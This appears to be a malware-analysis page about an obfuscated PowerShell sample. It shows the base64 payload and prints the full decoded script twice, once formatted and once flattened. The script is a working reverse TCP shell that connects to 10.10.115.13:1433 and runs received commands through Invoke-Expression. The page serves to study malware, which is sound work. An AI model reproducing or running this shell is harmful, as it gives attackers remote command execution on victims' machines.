Malicious Powershell Script

Sample Details

Sample name - Malware.PSObfusc.ps1.malz Malware Type - Reverse shell

Analysis

Script - This malware is holding the malicious part inside of a base64 string and executing it.

The base 64 code -

tVVpbxMxEP2cSv0PVhqhRLAm6cVRgVTSg0q91EScQsi7mSSmjr14vWlLyX/H115JKEUUJ9pj5s2befbYu7b2MKO+s7qyhh5k3M11Lq5A9sbAGLqAKcgEUL97jqYbeOuvuRZHeIOOpoSjHuURXP4b113Dcx1S9TYNkYRYJFQJeYOIQiOqxmmIIzF5SnUtQWJreRob4YkRHkgnPFBRjHOuAwCGhhIAKYEGghMFKKQqEpQb1s4b+elku//s8MXF6fNpSEI+/JBunmwfx6Mf6vv2x84m/i8aH2oYMvNrRIwCV+gVavCUMW1tJEoCmZQtYTocgixbriRVVcuAKFJ+l5CkrMyr9HLcrq4YKQ0aa0e908bm39nCnY2698RCmqDO5sbG6kqtqO4UroKz8BtESj8q3BPRJagE96O4ayFNzfnEhbd2TGShwnHgQ1A9a2s6QC6qRP3mRsHnL6jTXt+0GOCRGFA+qqL6cK3wbhJRuu/9FpzPSQl6dIZd0vfW2fRltUoBeDdV4oClydgUq2QKrjxdSqItbfM2EGbqanmIZWvWz3uv65YqBxRxPhO+ADJoerFPUFvPkXvGx8BHauzCa3SImj40GCnUbnm6Wr6u9v4Y5VPi51M/zbEbEs86M9cZuhpTBijTjvc00+6UUEZCBg75u/SV7LgvqV88H2GtTsdc2b7ZalZC3opHfCouIdi/jrUpoYKjoCsmE8IHXt/660cd9BOdpSpw2lwyrSEiKhovoWx8xfvXEcTKsC2LdLcuAyKDd0RSIxoFp2QCqG5y1j2wwZwOTenIvTDvtnrZMql6k4jU7pG2xxbdsBAI88uPblHRMhXXDpohYPp7UEawzJXRVzsyKz1Jw8T3hi0u74vWTh7oqn78yrsKR1bsvKdopMo8ZO7lU+wKqldWw7WlvhSM5d7T2PJ6V5YYH3EOsng90X1ERmBDhpQTxlzf2Vn3B0LAwR2Creom7jKRgO/nzLZHk7iwLpfkoFbSLEvlT7uFVH7LVVJl2/AeqRy0msofyQup/DFbSeVt90nloNVU/oheSOX71BLdSeqAVVK/dedJ/9g+OYE9Ke4Xnm9wE/y5d5MomODD7peXL7uCMf2BsNXPfgE=

We put this script as a variable in powershell-

We then decrypt it using-

	write-host $megasus

The malicious script in question -

########################################################################";
#                                                                      #";
#                        PowerShell Reverse TCP v3.5                   #";
#                                          by Ivan Sincek              #";
#                                                                      #";
# GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp.  #";
# Feel free to donate bitcoin at 1BrZM6T7G9RN8vbabnfXu4M6Lpgztq6Y14.   #";
#                                                                      #";
#########################################################################";


$client = $null;
$stream = $null;
$buffer = $null;
$writer = $null;
$data = $null;
$result = $null;
try {
    $ip = "10.10.115.13"
    $port = 1433
        $client = New-Object Net.Sockets.TcpClient($ip, $port);
        $stream = $client.GetStream();
        $buffer = New-Object Byte[] 1024;
        $encoding = New-Object Text.AsciiEncoding;
        $writer = New-Object IO.StreamWriter($stream);
        $writer.AutoFlush = $true;
        $bytes = 0;
        do {
                $writer.Write("PS>");
                do {
                        $bytes = $stream.Read($buffer, 0, $buffer.Length);
                        if ($bytes -gt 0) {
                                $data = $data + $encoding.GetString($buffer, 0, $bytes);                        }
                } while ($stream.DataAvailable);
                if ($bytes -gt 0) {
                        $data = $data.Trim();
                        if ($data.Length -gt 0) {
                                try {
                                        $result = Invoke-Expression -Command $data 2>&1 | Out-String;
                                } catch {
                                        $result = $_.Exception | Out-String;
                                }
                                Clear-Variable -Name "data";
                                $length = $result.Length;
                                if ($length -gt 0) {
                                        $count = 0;
                                        do {
                                                if ($length -ge $buffer.Length) { $bytes = $buffer.Length; } else { $bytes = $length; }
                                                $writer.Write($result.substring($count, $bytes));
                                                $count += $bytes;
                                                $length -= $bytes;
                                        } while ($length -gt 0);
                                        Clear-Variable -Name "result";
                                }
                        }
                }
        } while ($bytes -gt 0);
} catch {
         $_.Exception.InnerException.Message;
} finally {
        if ($writer -ne $null) {
                $writer.Close();
                $writer.Dispose();
                Clear-Variable -Name "writer";
        }
        if ($stream -ne $null) {
                $stream.Close();
                $stream.Dispose();
                Clear-Variable -Name "stream";
        }
        if ($client -ne $null) {
                $client.Close();
                $client.Dispose();
                Clear-Variable -Name "client";
        }
        if ($buffer -ne $null) {
                $buffer.Clear();
                Clear-Variable -Name "buffer";
        }
        if ($result -ne $null) {
                Clear-Variable -Name "result";
        }
        if ($data -ne $null) {
                Clear-Variable -Name "data";
        }
        [System.GC]::Collect();
}

This seems to be a reverse tcp shell connecting to 10.10.115.13 : 1433

PreviousBind_shell RAT Analysis NextMalicious HTA(HTML Applications)

Last updated 7 months ago

########################################################################"; # #"; # PowerShell Reverse TCP v3.5 #"; # by Ivan Sincek #"; # #"; # GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp. #"; # Feel free to donate bitcoin at 1BrZM6T7G9RN8vbabnfXu4M6Lpgztq6Y14. #"; # #"; #########################################################################"; $client = $null; $stream = $null; $buffer = $null; $writer = $null; $data = $null; $result = $null; try { $ip = "10.10.115.13" $port = 1433 $client = New-Object Net.Sockets.TcpClient($ip, $port); $stream = $client.GetStream(); $buffer = New-Object Byte[] 1024; $encoding = New-Object Text.AsciiEncoding; $writer = New-Object IO.StreamWriter($stream); $writer.AutoFlush = $true; $bytes = 0; do { $writer.Write("PS>"); do { $bytes = $stream.Read($buffer, 0, $buffer.Length); if ($bytes -gt 0) { $data = $data + $encoding.GetString($buffer, 0, $bytes); } } while ($stream.DataAvailable); if ($bytes -gt 0) { $data = $data.Trim(); if ($data.Length -gt 0) { try { $result = Invoke-Expression -Command $data 2>&1 | Out-String; } catch { $result = $_.Exception | Out-String; } Clear-Variable -Name "data"; $length = $result.Length; if ($length -gt 0) { $count = 0; do { if ($length -ge $buffer.Length) { $bytes = $buffer.Length; } else { $bytes = $length; } $writer.Write($result.substring($count, $bytes)); $count += $bytes; $length -= $bytes; } while ($length -gt 0); Clear-Variable -Name "result"; } } } } while ($bytes -gt 0); } catch { $_.Exception.InnerException.Message; } finally { if ($writer -ne $null) { $writer.Close(); $writer.Dispose(); Clear-Variable -Name "writer"; } if ($stream -ne $null) { $stream.Close(); $stream.Dispose(); Clear-Variable -Name "stream"; } if ($client -ne $null) { $client.Close(); $client.Dispose(); Clear-Variable -Name "client"; } if ($buffer -ne $null) { $buffer.Clear(); Clear-Variable -Name "buffer"; } if ($result -ne $null) { Clear-Variable -Name "result"; } if ($data -ne $null) { Clear-Variable -Name "data"; } [System.GC]::Collect(); }